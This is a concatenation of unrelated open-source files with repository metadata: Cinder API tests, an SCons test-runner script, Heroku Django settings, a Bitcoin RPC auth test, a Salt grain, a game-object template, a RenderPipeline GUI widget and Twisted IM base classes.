req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
def test_update_all_malformed_container(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_malformed_data(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body)
def test_update_item(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.req_id, 'key1', body)
expected = {'meta': {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(
'/v2/fake/snapshots/asdf/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
None)
def test_update_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, '', body)
def test_update_item_key_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, ("a" * 260), body)
def test_update_item_value_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, "key1", body)
def test_update_item_too_many_keys(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'bad',
body)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
#test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
#test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
#test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, data)
| {
"content_hash": "ddeb418d997c543d038dff4d7f47bda7",
"timestamp": "",
"source": "github",
"line_count": 538,
"max_line_length": 78,
"avg_line_length": 38.11524163568773,
"alnum_prop": 0.567833804740076,
"repo_name": "blueboxgroup/cinder",
"id": "2fd62ca3707762107cab57ec913bd9bef01fb01f",
"size": "21142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cinder/tests/api/v2/test_snapshot_metadata.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3322"
},
{
"name": "Python",
"bytes": "10024269"
},
{
"name": "Shell",
"bytes": "9905"
}
],
"symlink_target": ""
} |
import getopt
import imp
import os
import os.path
import sys
import tempfile
import time
import zipfile
try:
# try Python 3.x style
from urllib.request import urlretrieve
except ImportError:
# nope, must be 2.x; this hack is equivalent
import imp
# protect import from fixer
urlretrieve = imp.load_module('urllib',
*imp.find_module('urllib')).urlretrieve
helpstr = """\
Usage: scons-test.py [-f zipfile] [-o outdir] [-v] [--xml] [runtest arguments]
Options:
-f FILE Specify input .zip FILE name
-o DIR, --out DIR Change output directory name to DIR
-v, --verbose Print file names when extracting
--xml XML output
"""
opts, args = getopt.getopt(sys.argv[1:],
"f:o:v",
['file=', 'out=', 'verbose', 'xml'])
format = None
outdir = None
printname = lambda x: x
inputfile = 'http://scons.sourceforge.net/scons-src-latest.zip'
for o, a in opts:
if o == '-f' or o == '--file':
inputfile = a
elif o == '-o' or o == '--out':
outdir = a
elif o == '-v' or o == '--verbose':
def printname(x):
print x
elif o == '--xml':
format = o
startdir = os.getcwd()
tempfile.template = 'scons-test.'
tempdir = tempfile.mktemp()
if not os.path.exists(tempdir):
os.mkdir(tempdir)
def cleanup(tempdir=tempdir):
import shutil
os.chdir(startdir)
shutil.rmtree(tempdir)
sys.exitfunc = cleanup
# Fetch the input file if it happens to be across a network somewhere.
# Ohmigod, does Python make this simple...
inputfile, headers = urlretrieve(inputfile)
# Unzip the header file in the output directory. We use our own code
# (lifted from scons-unzip.py) to make the output subdirectory name
# match the basename of the .zip file.
zf = zipfile.ZipFile(inputfile, 'r')
if outdir is None:
name, _ = os.path.splitext(os.path.basename(inputfile))
outdir = os.path.join(tempdir, name)
def outname(n, outdir=outdir):
l = []
while True:
n, tail = os.path.split(n)
if not n:
break
l.append(tail)
l.append(outdir)
l.reverse()
return os.path.join(*l)
for name in zf.namelist():
dest = outname(name)
dir = os.path.dirname(dest)
try:
os.makedirs(dir)
except:
pass
printname(dest)
# if the file exists, then delete it before writing
# to it so that we don't end up trying to write to a symlink:
if os.path.isfile(dest) or os.path.islink(dest):
os.unlink(dest)
if not os.path.isdir(dest):
open(dest, 'w').write(zf.read(name))
os.chdir(outdir)
# Load (by hand) the SCons modules we just unwrapped so we can
# extract their version information. Note that we have to override
# SCons.Script.main() with a do_nothing() function, because loading up
# the 'scons' script will actually try to execute SCons...
src_script = os.path.join(outdir, 'src', 'script')
src_engine = os.path.join(outdir, 'src', 'engine')
src_engine_SCons = os.path.join(src_engine, 'SCons')
fp, pname, desc = imp.find_module('SCons', [src_engine])
SCons = imp.load_module('SCons', fp, pname, desc)
fp, pname, desc = imp.find_module('Script', [src_engine_SCons])
SCons.Script = imp.load_module('Script', fp, pname, desc)
def do_nothing():
pass
SCons.Script.main = do_nothing
fp, pname, desc = imp.find_module('scons', [src_script])
scons = imp.load_module('scons', fp, pname, desc)
fp.close()
# Default is to run all the tests by passing the -a flags to runtest.py.
if not args:
runtest_args = '-a'
else:
runtest_args = ' '.join(args)
if format == '--xml':
print "<scons_test_run>"
print " <sys>"
sys_keys = ['byteorder', 'exec_prefix', 'executable', 'maxint', 'maxunicode', 'platform', 'prefix', 'version', 'version_info']
for k in sys_keys:
print " <%s>%s</%s>" % (k, sys.__dict__[k], k)
print " </sys>"
fmt = '%a %b %d %H:%M:%S %Y'
print " <time>"
print " <gmtime>%s</gmtime>" % time.strftime(fmt, time.gmtime())
print " <localtime>%s</localtime>" % time.strftime(fmt, time.localtime())
print " </time>"
print " <tempdir>%s</tempdir>" % tempdir
def print_version_info(tag, module):
print " <%s>" % tag
print " <version>%s</version>" % module.__version__
print " <build>%s</build>" % module.__build__
print " <buildsys>%s</buildsys>" % module.__buildsys__
print " <date>%s</date>" % module.__date__
print " <developer>%s</developer>" % module.__developer__
print " </%s>" % tag
print " <scons>"
print_version_info("script", scons)
print_version_info("engine", SCons)
print " </scons>"
environ_keys = [
'PATH',
'SCONSFLAGS',
'SCONS_LIB_DIR',
'PYTHON_ROOT',
'QTDIR',
'COMSPEC',
'INTEL_LICENSE_FILE',
'INCLUDE',
'LIB',
'MSDEVDIR',
'OS',
'PATHEXT',
'SystemRoot',
'TEMP',
'TMP',
'USERNAME',
'VXDOMNTOOLS',
'WINDIR',
'XYZZY'
'ENV',
'HOME',
'LANG',
'LANGUAGE',
'LOGNAME',
'MACHINE',
'OLDPWD',
'PWD',
'OPSYS',
'SHELL',
'TMPDIR',
'USER',
]
print " <environment>"
for key in sorted(environ_keys):
value = os.environ.get(key)
if value:
print " <variable>"
print " <name>%s</name>" % key
print " <value>%s</value>" % value
print " </variable>"
print " </environment>"
command = '"%s" runtest.py -q -o - --xml %s' % (sys.executable, runtest_args)
#print command
os.system(command)
print "</scons_test_run>"
else:
def print_version_info(tag, module):
print "\t%s: v%s.%s, %s, by %s on %s" % (tag,
module.__version__,
module.__build__,
module.__date__,
module.__developer__,
module.__buildsys__)
print "SCons by Steven Knight et al.:"
print_version_info("script", scons)
print_version_info("engine", SCons)
command = '"%s" runtest.py %s' % (sys.executable, runtest_args)
#print command
os.system(command)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "fa385c9cf58789c65b250c6962b04888",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 130,
"avg_line_length": 28.52340425531915,
"alnum_prop": 0.551544084738177,
"repo_name": "azatoth/scons",
"id": "2191532c7f6a2c1b62a371bcb87b8d9ddcd41a49",
"size": "7415",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bin/scons-test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6716123"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
"""
Django settings for gettingstarted project, on Heroku. Fore more info, see:
https://github.com/heroku/heroku-django-template
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i+acxn5(akgsn!sr4^qgf(^m&*@+g1@u^t@=8s@axc41ml*f=s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'hello'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'gettingstarted.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'gettingstarted.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Parse database configuration from $DATABASE_URL
DATABASES['default'] = dj_database_url.config()
# Enable Connection Pooling (if desired)
DATABASES['default']['ENGINE'] = 'django_postgrespool'
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| {
"content_hash": "c1bf9bfcb441f5be7b61c5b50d55c99a",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 75,
"avg_line_length": 27.647540983606557,
"alnum_prop": 0.7032315446190335,
"repo_name": "toroio-alex/heroku-python",
"id": "24b9558ecbd00a0927139c6fb1b2df4d106791fd",
"size": "3373",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "gettingstarted/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6887"
},
{
"name": "Python",
"bytes": "5231"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain(self.options.tmpdir)
#Append rpcauth to bitcoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
with open(os.path.join(self.options.tmpdir+"/node0", "bitcoin.conf"), 'a') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| {
"content_hash": "450eaca745cbeaf45ab1d4c550810d94",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 129,
"avg_line_length": 40.25714285714286,
"alnum_prop": 0.6323633782824698,
"repo_name": "BTCfork/hardfork_prototype_1_mvf-bu",
"id": "133d89ad6dfaa5941005a808be73512f68340899",
"size": "4548",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/multi_rpc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "682360"
},
{
"name": "C++",
"bytes": "5102661"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "189719"
},
{
"name": "Makefile",
"bytes": "111286"
},
{
"name": "Objective-C",
"bytes": "5785"
},
{
"name": "Objective-C++",
"bytes": "7360"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "962519"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Roff",
"bytes": "3821"
},
{
"name": "Shell",
"bytes": "44285"
}
],
"symlink_target": ""
} |
import os
import platform
def provide_system_boot_type():
if platform.system() == 'Linux':
# See also:
# http://askubuntu.com/a/162896
if os.path.exists('/sys/firmware/efi'):
return { 'system_boot_type': 'UEFI' }
else:
return { 'system_boot_type': 'BIOS' }
else:
return { 'system_boot_type': False }
| {
"content_hash": "2cccf7dfb9a31988d0a58ba0c72fd79b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 49,
"avg_line_length": 25.133333333333333,
"alnum_prop": 0.5464190981432361,
"repo_name": "uvsmtid/common-salt-states",
"id": "a11d82234b9c526266e33b03debc20d1eacb0712",
"size": "378",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "states/_grains/system_boot_type.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7830"
},
{
"name": "Erlang",
"bytes": "21224"
},
{
"name": "Java",
"bytes": "987"
},
{
"name": "Python",
"bytes": "307941"
},
{
"name": "Ruby",
"bytes": "20793"
},
{
"name": "SaltStack",
"bytes": "1039440"
},
{
"name": "Scheme",
"bytes": "5298"
},
{
"name": "Shell",
"bytes": "50876"
},
{
"name": "VimL",
"bytes": "3502"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Ship()
result.template = "object/ship/shared_blacksun_heavy_s03.iff"
result.attribute_template_id = -1
result.stfName("","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "ed6ef71c96a7e91ae9ecf253f2ccaa10",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 62,
"avg_line_length": 20.76923076923077,
"alnum_prop": 0.6666666666666666,
"repo_name": "obi-two/Rebelion",
"id": "cdafa95485f24e5e8be00d19ae90a91525a59b87",
"size": "415",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/ship/shared_blacksun_heavy_s03.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from panda3d.core import CardMaker, Vec2, GraphicsWindow
from rpcore.rpobject import RPObject
from rpcore.globals import Globals
from rpcore.loader import RPLoader
class PixelInspector(RPObject):
""" Widget to analyze the rendered pixels, by zooming in """
def __init__(self, pipeline):
RPObject.__init__(self)
self._pipeline = pipeline
self._node = Globals.base.pixel2d.attach_new_node("ExposureWidgetNode")
self._create_components()
self.hide()
def _create_components(self):
""" Internal method to init the widgets components """
card_maker = CardMaker("PixelInspector")
card_maker.set_frame(-200, 200, -150, 150)
self._zoomer = self._node.attach_new_node(card_maker.generate())
# Defer the further loading
Globals.base.taskMgr.doMethodLater(
1.0, self._late_init, "PixelInspectorLateInit")
Globals.base.accept("q", self.show)
Globals.base.accept("q-up", self.hide)
def show(self):
""" Shows the inspector """
self._node.show()
def hide(self):
""" Shows the inspector """
self._node.hide()
def _late_init(self, task):
""" Gets called after the pipeline got initialized """
scene_tex = self._pipeline.stage_mgr.pipes["ShadedScene"]
self._zoomer.set_shader(RPLoader.load_shader(
"/$$rp/shader/default_gui_shader.vert.glsl",
"/$$rp/shader/pixel_inspector.frag.glsl"))
self._zoomer.set_shader_input("SceneTex", scene_tex)
return task.done
def update(self):
""" Updates the pixel preview """
if isinstance(Globals.base.win, GraphicsWindow):
mouse = Globals.base.win.get_pointer(0)
if mouse.get_in_window():
pos = mouse.get_x(), 1, -mouse.get_y()
rel_mouse_pos = Vec2(mouse.get_x(), Globals.base.win.get_y_size() - mouse.get_y())
self._node.set_pos(pos)
self._zoomer.set_shader_input("mousePos", rel_mouse_pos)
| {
"content_hash": "cbda035d5167bff119eb795c6e1356fc",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 98,
"avg_line_length": 40.6375,
"alnum_prop": 0.6607197785296832,
"repo_name": "croxis/SpaceDrive",
"id": "7bed13ab75f3530e9b7c8e9fafe0ceda9f63e840",
"size": "3251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spacedrive/renderpipeline/rpcore/gui/pixel_inspector.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1288"
},
{
"name": "C",
"bytes": "21897"
},
{
"name": "C++",
"bytes": "165025"
},
{
"name": "GLSL",
"bytes": "741524"
},
{
"name": "Groff",
"bytes": "119"
},
{
"name": "Python",
"bytes": "1523574"
}
],
"symlink_target": ""
} |
#
"""Instance Messenger base classes for protocol support.
You will find these useful if you're adding a new protocol to IM.
"""
# Abstract representation of chat "model" classes
from twisted.words.im.locals import ONLINE, OFFLINE, OfflineError
from twisted.words.im import interfaces
from twisted.internet.protocol import Protocol
from twisted.python.reflect import prefixedMethods
from twisted.persisted import styles
from twisted.internet import error
class AbstractGroup:
def __init__(self, name, account):
self.name = name
self.account = account
def getGroupCommands(self):
"""finds group commands
these commands are methods on me that start with imgroup_; they are
called with no arguments
"""
return prefixedMethods(self, "imgroup_")
def getTargetCommands(self, target):
"""finds group commands
these commands are methods on me that start with imgroup_; they are
called with a user present within this room as an argument
you may want to override this in your group in order to filter for
appropriate commands on the given user
"""
return prefixedMethods(self, "imtarget_")
def join(self):
if not self.account.client:
raise OfflineError
self.account.client.joinGroup(self.name)
def leave(self):
if not self.account.client:
raise OfflineError
self.account.client.leaveGroup(self.name)
def __repr__(self):
return '<%s %r>' % (self.__class__, self.name)
def __str__(self):
return '%s@%s' % (self.name, self.account.accountName)
class AbstractPerson:
def __init__(self, name, baseAccount):
self.name = name
self.account = baseAccount
self.status = OFFLINE
def getPersonCommands(self):
"""finds person commands
these commands are methods on me that start with imperson_; they are
called with no arguments
"""
return prefixedMethods(self, "imperson_")
def getIdleTime(self):
"""
Returns a string.
"""
return '--'
def __repr__(self):
return '<%s %r/%s>' % (self.__class__, self.name, self.status)
def __str__(self):
return '%s@%s' % (self.name, self.account.accountName)
class AbstractClientMixin:
"""Designed to be mixed in to a Protocol implementing class.
Inherit from me first.
@ivar _logonDeferred: Fired when I am done logging in.
"""
def __init__(self, account, chatui, logonDeferred):
for base in self.__class__.__bases__:
if issubclass(base, Protocol):
self.__class__._protoBase = base
break
else:
pass
self.account = account
self.chat = chatui
self._logonDeferred = logonDeferred
def connectionMade(self):
self._protoBase.connectionMade(self)
def connectionLost(self, reason):
self.account._clientLost(self, reason)
self.unregisterAsAccountClient()
return self._protoBase.connectionLost(self, reason)
def unregisterAsAccountClient(self):
"""Tell the chat UI that I have `signed off'.
"""
self.chat.unregisterAccountClient(self)
class AbstractAccount(styles.Versioned):
"""Base class for Accounts.
I am the start of an implementation of L{IAccount<interfaces.IAccount>}, I
implement L{isOnline} and most of L{logOn}, though you'll need to implement
L{_startLogOn} in a subclass.
@cvar _groupFactory: A Callable that will return a L{IGroup} appropriate
for this account type.
@cvar _personFactory: A Callable that will return a L{IPerson} appropriate
for this account type.
@type _isConnecting: boolean
@ivar _isConnecting: Whether I am in the process of establishing a
connection to the server.
@type _isOnline: boolean
@ivar _isOnline: Whether I am currently on-line with the server.
@ivar accountName:
@ivar autoLogin:
@ivar username:
@ivar password:
@ivar host:
@ivar port:
"""
_isOnline = 0
_isConnecting = 0
client = None
_groupFactory = AbstractGroup
_personFactory = AbstractPerson
persistanceVersion = 2
def __init__(self, accountName, autoLogin, username, password, host, port):
self.accountName = accountName
self.autoLogin = autoLogin
self.username = username
self.password = password
self.host = host
self.port = port
self._groups = {}
self._persons = {}
def upgrateToVersion2(self):
# Added in CVS revision 1.16.
for k in ('_groups', '_persons'):
if not hasattr(self, k):
setattr(self, k, {})
def __getstate__(self):
state = styles.Versioned.__getstate__(self)
for k in ('client', '_isOnline', '_isConnecting'):
try:
del state[k]
except KeyError:
pass
return state
def isOnline(self):
return self._isOnline
def logOn(self, chatui):
"""Log on to this account.
Takes care to not start a connection if a connection is
already in progress. You will need to implement
L{_startLogOn} for this to work, and it would be a good idea
to override L{_loginFailed} too.
@returntype: Deferred L{interfaces.IClient}
"""
if (not self._isConnecting) and (not self._isOnline):
self._isConnecting = 1
d = self._startLogOn(chatui)
d.addCallback(self._cb_logOn)
# if chatui is not None:
# (I don't particularly like having to pass chatUI to this function,
# but we haven't factored it out yet.)
d.addCallback(chatui.registerAccountClient)
d.addErrback(self._loginFailed)
return d
else:
raise error.ConnectError("Connection in progress")
def getGroup(self, name):
"""Group factory.
@param name: Name of the group on this account.
@type name: string
"""
group = self._groups.get(name)
if group is None:
group = self._groupFactory(name, self)
self._groups[name] = group
return group
